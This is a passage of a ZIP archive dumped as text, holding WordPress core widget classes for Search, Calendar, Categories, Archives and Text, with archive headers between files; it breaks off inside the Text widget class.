﻿﻿﻿PK     \}ä
  
    class-wp-widget-search.phpnu [        <?php
/**
 * Widget API: WP_Widget_Search class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 4.4.0
 */

/**
 * Core class used to implement a Search widget.
 *
 * @since 2.8.0
 *
 * @see WP_Widget
 */
class WP_Widget_Search extends WP_Widget {

	/**
	 * Sets up a new Search widget instance.
	 *
	 * @since 2.8.0
	 */
	public function __construct() {
		$widget_ops = array(
			'classname'                   => 'widget_search',
			'description'                 => __( 'A search form for your site.' ),
			'customize_selective_refresh' => true,
			'show_instance_in_rest'       => true,
		);
		parent::__construct( 'search', _x( 'Search', 'Search widget' ), $widget_ops );
	}

	/**
	 * Outputs the content for the current Search widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $args     Display arguments including 'before_title', 'after_title',
	 *                        'before_widget', and 'after_widget'.
	 * @param array $instance Settings for the current Search widget instance.
	 */
	public function widget( $args, $instance ) {
		$title = ! empty( $instance['title'] ) ? $instance['title'] : '';

		/** This filter is documented in wp-includes/widgets/class-wp-widget-pages.php */
		$title = apply_filters( 'widget_title', $title, $instance, $this->id_base );

		echo $args['before_widget'];
		if ( $title ) {
			echo $args['before_title'] . $title . $args['after_title'];
		}

		// Use active theme search form if it exists.
		get_search_form();

		echo $args['after_widget'];
	}

	/**
	 * Outputs the settings form for the Search widget.
	 *
	 * @since 2.8.0
	 *
	 * @param array $instance Current settings.
	 */
	public function form( $instance ) {
		$instance = wp_parse_args( (array) $instance, array( 'title' => '' ) );
		$title    = $instance['title'];
		?>
		<p>
			<label for="<?php echo $this->get_field_id( 'title' ); ?>"><?php _e( 'Title:' ); ?></label>
			<input class="widefat" id="<?php echo $this->get_field_id( 'title' ); ?>" name="<?php echo $this->get_field_name( 'title' ); ?>" type="text" value="<?php echo esc_attr( $title ); ?>" />
		</p>
		<?php
	}

	/**
	 * Handles updating settings for the current Search widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $new_instance New settings for this instance as input by the user via
	 *                            WP_Widget::form().
	 * @param array $old_instance Old settings for this instance.
	 * @return array Updated settings.
	 */
	public function update( $new_instance, $old_instance ) {
		$instance          = $old_instance;
		$new_instance      = wp_parse_args( (array) $new_instance, array( 'title' => '' ) );
		$instance['title'] = sanitize_text_field( $new_instance['title'] );
		return $instance;
	}
}
PK     \*O
a  a    class-wp-widget-calendar.phpnu [        <?php
/**
 * Widget API: WP_Widget_Calendar class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 4.4.0
 */

/**
 * Core class used to implement the Calendar widget.
 *
 * @since 2.8.0
 *
 * @see WP_Widget
 */
class WP_Widget_Calendar extends WP_Widget {
	/**
	 * Ensure that the ID attribute only appears in the markup once
	 *
	 * @since 4.4.0
	 * @var int
	 */
	private static $instance = 0;

	/**
	 * Sets up a new Calendar widget instance.
	 *
	 * @since 2.8.0
	 */
	public function __construct() {
		$widget_ops = array(
			'classname'                   => 'widget_calendar',
			'description'                 => __( 'A calendar of your site’s posts.' ),
			'customize_selective_refresh' => true,
			'show_instance_in_rest'       => true,
		);
		parent::__construct( 'calendar', __( 'Calendar' ), $widget_ops );
	}

	/**
	 * Outputs the content for the current Calendar widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $args     Display arguments including 'before_title', 'after_title',
	 *                        'before_widget', and 'after_widget'.
	 * @param array $instance The settings for the particular instance of the widget.
	 */
	public function widget( $args, $instance ) {
		$title = ! empty( $instance['title'] ) ? $instance['title'] : '';

		/** This filter is documented in wp-includes/widgets/class-wp-widget-pages.php */
		$title = apply_filters( 'widget_title', $title, $instance, $this->id_base );

		echo $args['before_widget'];
		if ( $title ) {
			echo $args['before_title'] . $title . $args['after_title'];
		}
		if ( 0 === self::$instance ) {
			echo '<div id="calendar_wrap" class="calendar_wrap">';
		} else {
			echo '<div class="calendar_wrap">';
		}
		get_calendar();
		echo '</div>';
		echo $args['after_widget'];

		++self::$instance;
	}

	/**
	 * Handles updating settings for the current Calendar widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $new_instance New settings for this instance as input by the user via
	 *                            WP_Widget::form().
	 * @param array $old_instance Old settings for this instance.
	 * @return array Updated settings to save.
	 */
	public function update( $new_instance, $old_instance ) {
		$instance          = $old_instance;
		$instance['title'] = sanitize_text_field( $new_instance['title'] );

		return $instance;
	}

	/**
	 * Outputs the settings form for the Calendar widget.
	 *
	 * @since 2.8.0
	 *
	 * @param array $instance Current settings.
	 */
	public function form( $instance ) {
		$instance = wp_parse_args( (array) $instance, array( 'title' => '' ) );
		?>
		<p>
			<label for="<?php echo $this->get_field_id( 'title' ); ?>"><?php _e( 'Title:' ); ?></label>
			<input class="widefat" id="<?php echo $this->get_field_id( 'title' ); ?>" name="<?php echo $this->get_field_name( 'title' ); ?>" type="text" value="<?php echo esc_attr( $instance['title'] ); ?>" />
		</p>
		<?php
	}
}
PK     \js.      class-wp-widget-categories.phpnu [        <?php
/**
 * Widget API: WP_Widget_Categories class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 4.4.0
 */

/**
 * Core class used to implement a Categories widget.
 *
 * @since 2.8.0
 *
 * @see WP_Widget
 */
class WP_Widget_Categories extends WP_Widget {

	/**
	 * Sets up a new Categories widget instance.
	 *
	 * @since 2.8.0
	 */
	public function __construct() {
		$widget_ops = array(
			'classname'                   => 'widget_categories',
			'description'                 => __( 'A list or dropdown of categories.' ),
			'customize_selective_refresh' => true,
			'show_instance_in_rest'       => true,
		);
		parent::__construct( 'categories', __( 'Categories' ), $widget_ops );
	}

	/**
	 * Outputs the content for the current Categories widget instance.
	 *
	 * @since 2.8.0
	 * @since 4.2.0 Creates a unique HTML ID for the `<select>` element
	 *              if more than one instance is displayed on the page.
	 *
	 * @param array $args     Display arguments including 'before_title', 'after_title',
	 *                        'before_widget', and 'after_widget'.
	 * @param array $instance Settings for the current Categories widget instance.
	 */
	public function widget( $args, $instance ) {
		static $first_dropdown = true;

		$default_title = __( 'Categories' );
		$title         = ! empty( $instance['title'] ) ? $instance['title'] : $default_title;

		/** This filter is documented in wp-includes/widgets/class-wp-widget-pages.php */
		$title = apply_filters( 'widget_title', $title, $instance, $this->id_base );

		$count        = ! empty( $instance['count'] ) ? '1' : '0';
		$hierarchical = ! empty( $instance['hierarchical'] ) ? '1' : '0';
		$dropdown     = ! empty( $instance['dropdown'] ) ? '1' : '0';

		echo $args['before_widget'];

		if ( $title ) {
			echo $args['before_title'] . $title . $args['after_title'];
		}

		$cat_args = array(
			'orderby'      => 'name',
			'show_count'   => $count,
			'hierarchical' => $hierarchical,
		);

		if ( $dropdown ) {
			printf( '<form action="%s" method="get">', esc_url( home_url() ) );
			$dropdown_id    = ( $first_dropdown ) ? 'cat' : "{$this->id_base}-dropdown-{$this->number}";
			$first_dropdown = false;

			echo '<label class="screen-reader-text" for="' . esc_attr( $dropdown_id ) . '">' . $title . '</label>';

			$cat_args['show_option_none'] = __( 'Select Category' );
			$cat_args['id']               = $dropdown_id;

			/**
			 * Filters the arguments for the Categories widget drop-down.
			 *
			 * @since 2.8.0
			 * @since 4.9.0 Added the `$instance` parameter.
			 *
			 * @see wp_dropdown_categories()
			 *
			 * @param array $cat_args An array of Categories widget drop-down arguments.
			 * @param array $instance Array of settings for the current widget.
			 */
			wp_dropdown_categories( apply_filters( 'widget_categories_dropdown_args', $cat_args, $instance ) );

			echo '</form>';

			ob_start();
			?>

<script>
( ( dropdownId ) => {
	const dropdown = document.getElementById( dropdownId );
	function onSelectChange() {
		setTimeout( () => {
			if ( 'escape' === dropdown.dataset.lastkey ) {
				return;
			}
			if ( dropdown.value && parseInt( dropdown.value ) > 0 && dropdown instanceof HTMLSelectElement ) {
				dropdown.parentElement.submit();
			}
		}, 250 );
	}
	function onKeyUp( event ) {
		if ( 'Escape' === event.key ) {
			dropdown.dataset.lastkey = 'escape';
		} else {
			delete dropdown.dataset.lastkey;
		}
	}
	function onClick() {
		delete dropdown.dataset.lastkey;
	}
	dropdown.addEventListener( 'keyup', onKeyUp );
	dropdown.addEventListener( 'click', onClick );
	dropdown.addEventListener( 'change', onSelectChange );
})( <?php echo wp_json_encode( $dropdown_id, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ); ?> );
</script>

			<?php
			wp_print_inline_script_tag( wp_remove_surrounding_empty_script_tags( ob_get_clean() ) . "\n//# sourceURL=" . rawurlencode( __METHOD__ ) );
		} else {
			$format = current_theme_supports( 'html5', 'navigation-widgets' ) ? 'html5' : 'xhtml';

			/** This filter is documented in wp-includes/widgets/class-wp-nav-menu-widget.php */
			$format = apply_filters( 'navigation_widgets_format', $format );

			if ( 'html5' === $format ) {
				// The title may be filtered: Strip out HTML and make sure the aria-label is never empty.
				$title      = trim( strip_tags( $title ) );
				$aria_label = $title ? $title : $default_title;
				echo '<nav aria-label="' . esc_attr( $aria_label ) . '">';
			}
			?>

			<ul>
				<?php
				$cat_args['title_li'] = '';

				/**
				 * Filters the arguments for the Categories widget.
				 *
				 * @since 2.8.0
				 * @since 4.9.0 Added the `$instance` parameter.
				 *
				 * @param array $cat_args An array of Categories widget options.
				 * @param array $instance Array of settings for the current widget.
				 */
				wp_list_categories( apply_filters( 'widget_categories_args', $cat_args, $instance ) );
				?>
			</ul>

			<?php
			if ( 'html5' === $format ) {
				echo '</nav>';
			}
		}

		echo $args['after_widget'];
	}

	/**
	 * Handles updating settings for the current Categories widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $new_instance New settings for this instance as input by the user via
	 *                            WP_Widget::form().
	 * @param array $old_instance Old settings for this instance.
	 * @return array Updated settings to save.
	 */
	public function update( $new_instance, $old_instance ) {
		$instance                 = $old_instance;
		$instance['title']        = sanitize_text_field( $new_instance['title'] );
		$instance['count']        = ! empty( $new_instance['count'] ) ? 1 : 0;
		$instance['hierarchical'] = ! empty( $new_instance['hierarchical'] ) ? 1 : 0;
		$instance['dropdown']     = ! empty( $new_instance['dropdown'] ) ? 1 : 0;

		return $instance;
	}

	/**
	 * Outputs the settings form for the Categories widget.
	 *
	 * @since 2.8.0
	 *
	 * @param array $instance Current settings.
	 */
	public function form( $instance ) {
		// Defaults.
		$instance     = wp_parse_args( (array) $instance, array( 'title' => '' ) );
		$count        = isset( $instance['count'] ) ? (bool) $instance['count'] : false;
		$hierarchical = isset( $instance['hierarchical'] ) ? (bool) $instance['hierarchical'] : false;
		$dropdown     = isset( $instance['dropdown'] ) ? (bool) $instance['dropdown'] : false;
		?>
		<p>
			<label for="<?php echo $this->get_field_id( 'title' ); ?>"><?php _e( 'Title:' ); ?></label>
			<input class="widefat" id="<?php echo $this->get_field_id( 'title' ); ?>" name="<?php echo $this->get_field_name( 'title' ); ?>" type="text" value="<?php echo esc_attr( $instance['title'] ); ?>" />
		</p>

		<p>
			<input type="checkbox" class="checkbox" id="<?php echo $this->get_field_id( 'dropdown' ); ?>" name="<?php echo $this->get_field_name( 'dropdown' ); ?>"<?php checked( $dropdown ); ?> />
			<label for="<?php echo $this->get_field_id( 'dropdown' ); ?>"><?php _e( 'Display as dropdown' ); ?></label>
			<br />

			<input type="checkbox" class="checkbox" id="<?php echo $this->get_field_id( 'count' ); ?>" name="<?php echo $this->get_field_name( 'count' ); ?>"<?php checked( $count ); ?> />
			<label for="<?php echo $this->get_field_id( 'count' ); ?>"><?php _e( 'Show post counts' ); ?></label>
			<br />

			<input type="checkbox" class="checkbox" id="<?php echo $this->get_field_id( 'hierarchical' ); ?>" name="<?php echo $this->get_field_name( 'hierarchical' ); ?>"<?php checked( $hierarchical ); ?> />
			<label for="<?php echo $this->get_field_id( 'hierarchical' ); ?>"><?php _e( 'Show hierarchy' ); ?></label>
		</p>
		<?php
	}
}
PK     \OM  M    class-wp-widget-archives.phpnu [        <?php
/**
 * Widget API: WP_Widget_Archives class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 4.4.0
 */

/**
 * Core class used to implement the Archives widget.
 *
 * @since 2.8.0
 *
 * @see WP_Widget
 */
class WP_Widget_Archives extends WP_Widget {

	/**
	 * Sets up a new Archives widget instance.
	 *
	 * @since 2.8.0
	 */
	public function __construct() {
		$widget_ops = array(
			'classname'                   => 'widget_archive',
			'description'                 => __( 'A monthly archive of your site&#8217;s Posts.' ),
			'customize_selective_refresh' => true,
			'show_instance_in_rest'       => true,
		);
		parent::__construct( 'archives', __( 'Archives' ), $widget_ops );
	}

	/**
	 * Outputs the content for the current Archives widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $args     Display arguments including 'before_title', 'after_title',
	 *                        'before_widget', and 'after_widget'.
	 * @param array $instance Settings for the current Archives widget instance.
	 */
	public function widget( $args, $instance ) {
		$default_title = __( 'Archives' );
		$title         = ! empty( $instance['title'] ) ? $instance['title'] : $default_title;

		/** This filter is documented in wp-includes/widgets/class-wp-widget-pages.php */
		$title = apply_filters( 'widget_title', $title, $instance, $this->id_base );

		$count    = ! empty( $instance['count'] ) ? '1' : '0';
		$dropdown = ! empty( $instance['dropdown'] ) ? '1' : '0';

		echo $args['before_widget'];

		if ( $title ) {
			echo $args['before_title'] . $title . $args['after_title'];
		}

		if ( $dropdown ) {
			$dropdown_id = "{$this->id_base}-dropdown-{$this->number}";
			?>
		<label class="screen-reader-text" for="<?php echo esc_attr( $dropdown_id ); ?>"><?php echo $title; ?></label>
		<select id="<?php echo esc_attr( $dropdown_id ); ?>" name="archive-dropdown">
			<?php
			/**
			 * Filters the arguments for the Archives widget drop-down.
			 *
			 * @since 2.8.0
			 * @since 4.9.0 Added the `$instance` parameter.
			 *
			 * @see wp_get_archives()
			 *
			 * @param array $args     An array of Archives widget drop-down arguments.
			 * @param array $instance Settings for the current Archives widget instance.
			 */
			$dropdown_args = apply_filters(
				'widget_archives_dropdown_args',
				array(
					'type'            => 'monthly',
					'format'          => 'option',
					'show_post_count' => $count,
				),
				$instance
			);

			switch ( $dropdown_args['type'] ) {
				case 'yearly':
					$label = __( 'Select Year' );
					break;
				case 'monthly':
					$label = __( 'Select Month' );
					break;
				case 'daily':
					$label = __( 'Select Day' );
					break;
				case 'weekly':
					$label = __( 'Select Week' );
					break;
				default:
					$label = __( 'Select Post' );
					break;
			}
			?>

			<option value=""><?php echo esc_html( $label ); ?></option>
			<?php wp_get_archives( $dropdown_args ); ?>

		</select>

			<?php ob_start(); ?>
<script>
( ( dropdownId ) => {
	const dropdown = document.getElementById( dropdownId );
	function onSelectChange() {
		setTimeout( () => {
			if ( 'escape' === dropdown.dataset.lastkey ) {
				return;
			}
			if ( dropdown.value ) {
				document.location.href = dropdown.value;
			}
		}, 250 );
	}
	function onKeyUp( event ) {
		if ( 'Escape' === event.key ) {
			dropdown.dataset.lastkey = 'escape';
		} else {
			delete dropdown.dataset.lastkey;
		}
	}
	function onClick() {
		delete dropdown.dataset.lastkey;
	}
	dropdown.addEventListener( 'keyup', onKeyUp );
	dropdown.addEventListener( 'click', onClick );
	dropdown.addEventListener( 'change', onSelectChange );
})( <?php echo wp_json_encode( $dropdown_id, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ); ?> );
</script>
			<?php
			wp_print_inline_script_tag( wp_remove_surrounding_empty_script_tags( ob_get_clean() ) . "\n//# sourceURL=" . rawurlencode( __METHOD__ ) );
		} else {
			$format = current_theme_supports( 'html5', 'navigation-widgets' ) ? 'html5' : 'xhtml';

			/** This filter is documented in wp-includes/widgets/class-wp-nav-menu-widget.php */
			$format = apply_filters( 'navigation_widgets_format', $format );

			if ( 'html5' === $format ) {
				// The title may be filtered: Strip out HTML and make sure the aria-label is never empty.
				$title      = trim( strip_tags( $title ) );
				$aria_label = $title ? $title : $default_title;
				echo '<nav aria-label="' . esc_attr( $aria_label ) . '">';
			}
			?>

			<ul>
				<?php
				wp_get_archives(
					/**
					 * Filters the arguments for the Archives widget.
					 *
					 * @since 2.8.0
					 * @since 4.9.0 Added the `$instance` parameter.
					 *
					 * @see wp_get_archives()
					 *
					 * @param array $args     An array of Archives option arguments.
					 * @param array $instance Array of settings for the current widget.
					 */
					apply_filters(
						'widget_archives_args',
						array(
							'type'            => 'monthly',
							'show_post_count' => $count,
						),
						$instance
					)
				);
				?>
			</ul>

			<?php
			if ( 'html5' === $format ) {
				echo '</nav>';
			}
		}

		echo $args['after_widget'];
	}

	/**
	 * Handles updating settings for the current Archives widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $new_instance New settings for this instance as input by the user via
	 *                            WP_Widget_Archives::form().
	 * @param array $old_instance Old settings for this instance.
	 * @return array Updated settings to save.
	 */
	public function update( $new_instance, $old_instance ) {
		$instance             = $old_instance;
		$new_instance         = wp_parse_args(
			(array) $new_instance,
			array(
				'title'    => '',
				'count'    => 0,
				'dropdown' => '',
			)
		);
		$instance['title']    = sanitize_text_field( $new_instance['title'] );
		$instance['count']    = $new_instance['count'] ? 1 : 0;
		$instance['dropdown'] = $new_instance['dropdown'] ? 1 : 0;

		return $instance;
	}

	/**
	 * Outputs the settings form for the Archives widget.
	 *
	 * @since 2.8.0
	 *
	 * @param array $instance Current settings.
	 */
	public function form( $instance ) {
		$instance = wp_parse_args(
			(array) $instance,
			array(
				'title'    => '',
				'count'    => 0,
				'dropdown' => '',
			)
		);
		?>
		<p>
			<label for="<?php echo $this->get_field_id( 'title' ); ?>"><?php _e( 'Title:' ); ?></label>
			<input class="widefat" id="<?php echo $this->get_field_id( 'title' ); ?>" name="<?php echo $this->get_field_name( 'title' ); ?>" type="text" value="<?php echo esc_attr( $instance['title'] ); ?>" />
		</p>
		<p>
			<input class="checkbox" type="checkbox"<?php checked( $instance['dropdown'] ); ?> id="<?php echo $this->get_field_id( 'dropdown' ); ?>" name="<?php echo $this->get_field_name( 'dropdown' ); ?>" />
			<label for="<?php echo $this->get_field_id( 'dropdown' ); ?>"><?php _e( 'Display as dropdown' ); ?></label>
			<br />
			<input class="checkbox" type="checkbox"<?php checked( $instance['count'] ); ?> id="<?php echo $this->get_field_id( 'count' ); ?>" name="<?php echo $this->get_field_name( 'count' ); ?>" />
			<label for="<?php echo $this->get_field_id( 'count' ); ?>"><?php _e( 'Show post counts' ); ?></label>
		</p>
		<?php
	}
}
PK     \gtfS  fS    class-wp-widget-text.phpnu [        <?php
/**
 * Widget API: WP_Widget_Text class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 4.4.0
 */

/**
 * Core class used to implement a Text widget.
 *
 * @since 2.8.0
 *
 * @see WP_Widget
 */
class WP_Widget_Text extends WP_Widget {

	/**
	 * Whether or not the widget has been registered yet.
	 *
	 * @since 4.8.1
	 * @var bool
	 */
	protected $registered = false;

	/**
	 * Sets up a new Text widget instance.
	 *
	 * @since 2.8.0
	 */
	public function __construct() {
		$widget_ops  = array(
			'classname'                   => 'widget_text',
			'description'                 => __( 'Arbitrary text.' ),
			'customize_selective_refresh' => true,
			'show_instance_in_rest'       => true,
		);
		$control_ops = array(
			'width'  => 400,
			'height' => 350,
		);
		parent::__construct( 'text', __( 'Text' ), $widget_ops, $control_ops );
	}

	/**
	 * Adds hooks for enqueueing assets when registering all widget instances of this widget class.
	 *
	 * @param int $number Optional. The unique order number of this widget instance
	 *                    compared to other instances of the same class. Default -1.
	 */
	public function _register_one( $number = -1 ) {
		parent::_register_one( $number );
		if ( $this->registered ) {
			return;
		}
		$this->registered = true;

		if ( $this->is_preview() ) {
			add_action( 'wp_enqueue_scripts', array( $this, 'enqueue_preview_scripts' ) );
		}

		/*
		 * Note that the widgets component in the customizer will also do
		 * the 'admin_print_scripts-widgets.php' action in WP_Customize_Widgets::print_scripts().
		 */
		add_action( 'admin_print_scripts-widgets.php', array( $this, 'enqueue_admin_scripts' ) );

		/*
		 * Note that the widgets component in the customizer will also do
		 * the 'admin_footer-widgets.php' action in WP_Customize_Widgets::print_footer_scripts().
		 */
		add_action( 'admin_footer-widgets.php', array( 'WP_Widget_Text', 'render_control_template_scripts' ) );
	}

	/**
	 * Determines whether a given instance is legacy and should bypass using TinyMCE.
	 *
	 * @since 4.8.1
	 *
	 * @param array $instance {
	 *     Instance data.
	 *
	 *     @type string      $text   Content.
	 *     @type bool|string $filter Whether autop or content filters should apply.
	 *     @type bool        $legacy Whether widget is in legacy mode.
	 * }
	 * @return bool Whether Text widget instance contains legacy data.
	 */
	public function is_legacy_instance( $instance ) {

		// Legacy mode when not in visual mode.
		if ( isset( $instance['visual'] ) ) {
			return ! $instance['visual'];
		}

		// Or, the widget has been added/updated in 4.8.0 then filter prop is 'content' and it is no longer legacy.
		if ( isset( $instance['filter'] ) && 'content' === $instance['filter'] ) {
			return false;
		}

		// If the text is empty, then nothing is preventing migration to TinyMCE.
		if ( empty( $instance['text'] ) ) {
			return false;
		}

		$wpautop         = ! empty( $instance['filter'] );
		$has_line_breaks = ( str_contains( trim( $instance['text'] ), "\n" ) );

		// If auto-paragraphs are not enabled and there are line breaks, then ensure legacy mode.
		if ( ! $wpautop && $has_line_breaks ) {
			return true;
		}

		// If an HTML comment is present, assume legacy mode.
		if ( str_contains( $instance['text'], '<!--' ) ) {
			return true;
		}

		// In the rare case that DOMDocument is not available we cannot reliably sniff content and so we assume legacy.
		if ( ! class_exists( 'DOMDocument' ) ) {
			// @codeCoverageIgnoreStart
			return true;
			// @codeCoverageIgnoreEnd
		}

		$doc = new DOMDocument();

		// Suppress warnings generated by loadHTML.
		$errors = libxml_use_internal_errors( true );
		// phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged
		@$doc->loadHTML(
			sprintf(
				'<!DOCTYPE html><html><head><meta charset="%s"></head><body>%s</body></html>',
				esc_attr( get_bloginfo( 'charset' ) ),
				$instance['text']
			)
		);
		libxml_use_internal_errors( $errors );

		$body = $doc->getElementsByTagName( 'body' )->item( 0 );

		// See $allowedposttags.
		$safe_elements_attributes = array(
			'strong'  => array(),
			'em'      => array(),
			'b'       => array(),
			'i'       => array(),
			'u'       => array(),
			's'       => array(),
			'ul'      => array(),
			'ol'      => array(),
			'li'      => array(),
			'hr'      => array(),
			'abbr'    => array(),
			'acronym' => array(),
			'code'    => array(),
			'dfn'     => array(),
			'a'       => array(
				'href' => true,
			),
			'img'     => array(
				'src' => true,
				'alt' => true,
			),
		);
		$safe_empty_elements      = array( 'img', 'hr', 'iframe' );

		foreach ( $body->getElementsByTagName( '*' ) as $element ) {
			/** @var DOMElement $element */
			$tag_name = strtolower( $element->nodeName );

			// If the element is not safe, then the instance is legacy.
			if ( ! isset( $safe_elements_attributes[ $tag_name ] ) ) {
				return true;
			}

			// If the element is not safely empty and it has empty contents, then legacy mode.
			if ( ! in_array( $tag_name, $safe_empty_elements, true ) && '' === trim( $element->textContent ) ) {
				return true;
			}

			// If an attribute is not recognized as safe, then the instance is legacy.
			foreach ( $element->attributes as $attribute ) {
				/** @var DOMAttr $attribute */
				$attribute_name = strtolower( $attribute->nodeName );

				if ( ! isset( $safe_elements_attributes[ $tag_name ][ $attribute_name ] ) ) {
					return true;
				}
			}
		}

		// Otherwise, the text contains no elements/attributes that TinyMCE could drop, and therefore the widget does not need legacy mode.
		return false;
	}

	/**
	 * Filters gallery shortcode attributes.
	 *
	 * Prevents all of a site's attachments from being shown in a gallery displayed on a
	 * non-singular template where a $post context is not available.
	 *
	 * @since 4.9.0
	 *
	 * @param array $attrs Attributes.
	 * @return array Attributes.
	 */
	public function _filter_gallery_shortcode_attrs( $attrs ) {
		if ( ! is_singular() && empty( $attrs['id'] ) && empty( $attrs['include'] ) ) {
			$attrs['id'] = -1;
		}
		return $attrs;
	}

	/**
	 * Outputs the content for the current Text widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @global WP_Post $post Global post object.
	 *
	 * @param array $args     Display arguments including 'before_title', 'after_title',
	 *                        'before_widget', and 'after_widget'.
	 * @param array $instance Settings for the current Text widget instance.
	 */
	public function widget( $args, $instance ) {
		global $post;

		$title = ! empty( $instance['title'] ) ? $instance['title'] : '';

		/** This filter is documented in wp-includes/widgets/class-wp-widget-pages.php */
		$title = apply_filters( 'widget_title', $title, $instance, $this->id_base );

		$text                  = ! empty( $instance['text'] ) ? $instance['text'] : '';
		$is_visual_text_widget = ( ! empty( $instance['visual'] ) && ! empty( $instance['filter'] ) );

		// In 4.8.0 only, visual Text widgets get filter=content, without visual prop; upgrade instance props just-in-time.
		if ( ! $is_visual_text_widget ) {
			$is_visual_text_widget = ( isset( $instance['filter'] ) && 'content' === $instance['filter'] );
		}
		if ( $is_visual_text_widget ) {
			$instance['filter'] = true;
			$instance['visual'] = true;
		}

		/*
		 * Suspend legacy plugin-supplied do_shortcode() for 'widget_text' filter for the visual Text widget to prevent
		 * shortcodes being processed twice. Now do_shortcode() is added to the 'widget_text_content' filter in core itself
		 * and it applies after wpautop() to prevent corrupting HTML output added by the shortcode. When do_shortcode() is
		 * added to 'widget_text_content' then do_shortcode() will be manually called when in legacy mode as well.
		 */
		$widget_text_do_shortcode_priority       = has_filter( 'widget_text', 'do_shortcode' );
		$should_suspend_legacy_shortcode_support = ( $is_visual_text_widget && false !== $widget_text_do_shortcode_priority );
		if ( $should_suspend_legacy_shortcode_support ) {
			remove_filter( 'widget_text', 'do_shortcode', $widget_text_do_shortcode_priority );
		}

		// Override global $post so filters (and shortcodes) apply in a consistent context.
		$original_post = $post;
		if ( is_singular() ) {
			// Make sure post is always the queried object on singular queries (not from another sub-query that failed to clean up the global $post).
			$post = get_queried_object();
		} else {
			// Nullify the $post global during widget rendering to prevent shortcodes from running with the unexpected context on archive queries.
			$post = null;
		}

		// Prevent dumping out all attachments from the media library.
		add_filter( 'shortcode_atts_gallery', array( $this, '_filter_gallery_shortcode_attrs' ) );

		/**
		 * Filters the content of the Text widget.
		 *
		 * @since 2.3.0
		 * @since 4.4.0 Added the `$widget` parameter.
		 * @since 4.8.1 The `$widget` param may now be a `WP_Widget_Custom_HTML` object in addition to a `WP_Widget_Text` object.
		 *
		 * @param string                               $text     The widget content.
		 * @param array                                $instance Array of settings for the current widget.
		 * @param WP_Widget_Text|WP_Widget_Custom_HTML $widget   Current text or HTML widget instance.
		 */
		$text = apply_filters( 'widget_text', $text, $instance, $this );

		if ( $is_visual_text_widget ) {

			/**
			 * Filters the content of the Text widget to apply changes expected from the visual (TinyMCE) editor.
			 *
			 * By default a subset of the_content filters are applied, including wpautop and wptexturize.
			 *
			 * @since 4.8.0
			 *
			 * @param string         $text     The widget content.
			 * @param array          $instance Array of settings for the current widget.
			 * @param WP_Widget_Text $widget   Current Text widget instance.
			 */
			$text = apply_filters( 'widget_text_content', $text, $instance, $this );
		} else {
			// Now in legacy mode, add paragraphs and line breaks when checkbox is checked.
			if ( ! empty( $instance['filter'] ) ) {
				$text = wpautop( $text );
			}

			/*
			 * Manually do shortcodes on the content when the core-added filter is present. It is added by default
			 * in core by adding do_shortcode() to the 'widget_text_content' filter to apply after wpautop().
			 * Since the legacy Text widget runs wpautop() after 'widget_text' filters are applied, the widget in
			 * legacy mode here manually applies do_shortcode() on the content unless the default
			 * core filter for 'widget_text_content' has been removed, or if do_shortcode() has already
			 * been applied via a plugin adding do_shortcode() to 'widget_text' filters.
			 */
			if ( has_filter( 'widget_text_content', 'do_shortcode' ) && ! $widget_text_do_shortcode_priority ) {
				if ( ! empty( $instance['filter'] ) ) {
					$text = shortcode_unautop( $text );
				}
				$text = do_shortcode( $text );
			}
		}

		// Restore post global.
		$post = $original_post;
		remove_filter( 'shortcode_atts_gallery', array( $this, '_filter_gallery_shortcode_attrs' ) );

		// Undo suspension of legacy plugin-supplied shortcode handling.
		if ( $should_suspend_legacy_shortcode_support ) {
			add_filter( 'widget_text', 'do_shortcode', $widget_text_do_shortcode_priority );
		}

		echo $args['before_widget'];
		if ( ! empty( $title ) ) {
			echo $args['before_title'] . $title . $args['after_title'];
		}

		$text = preg_replace_callback( '#<(video|iframe|object|embed)\s[^>]*>#i', array( $this, 'inject_video_max_width_style' ), $text );

		?>
			<div class="textwidget"><?php echo $text; ?></div>
		<?php
		echo $args['after_widget'];
	}

	/**
	 * Injects max-width and removes height for videos too constrained to fit inside sidebars on frontend.
	 *
	 * @since 4.9.0
	 *
	 * @see WP_Widget_Media_Video::inject_video_max_width_style()
	 *
	 * @param array $matches Pattern matches from preg_replace_callback.
	 * @return string HTML Output.
	 */
	public function inject_video_max_width_style( $matches ) {
		$html = $matches[0];
		$html = preg_replace( '/\sheight="\d+"/', '', $html );
		$html = preg_replace( '/\swidth="\d+"/', '', $html );
		$html = preg_replace( '/(?<=width:)\s*\d+px(?=;?)/', '100%', $html );
		return $html;
	}

	/**
	 * Handles updating settings for the current Text widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $new_instance New settings for this instance as input by the user via
	 *                            WP_Widget::form().
	 * @param array $old_instance Old settings for this instance.
	 * @return array Settings to save or bool false to cancel saving.
	 */
	public function update( $new_instance, $old_instance ) {
		$new_instance = wp_parse_args(
			$new_instance,
			array(
				'title'  => '',
				'text'   => '',
				'filter' => false, // For back-compat.
				'visual' => null,  // Must be explicitly defined.
			)
		);

		$instance = $old_instance;

		$instance['title'] = sanitize_text_field( $new_instance['title'] );
		if ( current_user_can( 'unfiltered_html' ) ) {
			$instance['text'] = $new_instance['text'];
		} else {
			$instance['text'] = wp_kses_post( $new_instance['text'] );
		}

		$instance['filter'] = ! empty( $new_instance['filter'] );

		// Upgrade 4.8.0 format.
		if ( isset( $old_instance['filter'] ) && 'content' === $old_instance['filter'] ) {
			$instance['visual'] = true;
		}
		if ( 'content' === $new_instance['filter'] ) {
			$instance['visual'] = true;
		}

		if ( isset( $new_instance['visual'] ) ) {
			$instance['visual'] = ! empty( $new_instance['visual'] );
		}

		// Filter is always true in visual mode.
		if ( ! empty( $instance['visual'] ) ) {
			$instance['filter'] = true;
		}

		return $instance;
	}

	/**
